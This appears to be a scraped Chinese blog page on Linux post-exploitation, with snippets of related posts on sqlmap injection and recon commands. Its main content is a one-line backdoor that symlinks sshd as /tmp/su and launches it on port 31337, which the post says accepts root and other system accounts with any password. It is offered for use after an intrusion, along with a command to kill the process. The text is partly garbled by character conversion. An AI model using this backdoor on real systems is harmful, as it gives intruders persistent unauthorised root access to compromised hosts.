linux 後滲透測試

2022-05-11 12:28:58 字數 473 閱讀 3575

linux 常用shell**方法小結: 

入侵得到shell後,對方防火牆沒限制,想快速開放乙個可以訪問的ssh埠肉雞上執行

myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=31337
就會派生乙個31337埠,然後連線31337,用root/bin/ftp/mail當使用者名稱,密碼隨意,就可登陸。效果圖:

臨時後門生成後,如果我們需要殺死這個程序,請使用以下語句。

myles@localhost# ps -ef |grep 31337

#查詢後門程序id

myles@localhost# kill -9 ssh_pid #使用kill -9 直接殺死程序

LINUX 三 滲透測試sqlmap

sql注入前提 1 引數由客戶端控制。2 引數可以傳入資料庫。sql注入本質 向url中新增非法sql語句,從而非法訪問頁面,達到從資料庫獲取資料的目的。一般 都有保護措施,可以選擇使用引數 dentify waf 進行waf測試 tamper 為繞過防火牆waf的指令碼 使用kali 自帶繞過防火...

滲透測試 提權後獲取資訊

uname a 檢視當前系統版本 核心等 whoami 檢視當前使用的使用者 pwd 檢視當前所在路徑 ifconfig a 檢視網絡卡資訊,ip mac等 iptables l 檢視防火牆規則 dpkg l 檢視已經安裝的軟體 ps aux 檢視程序 netstat nr 檢視閘道器 netsta...

滲透測試學習筆記 初識滲透測試

黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...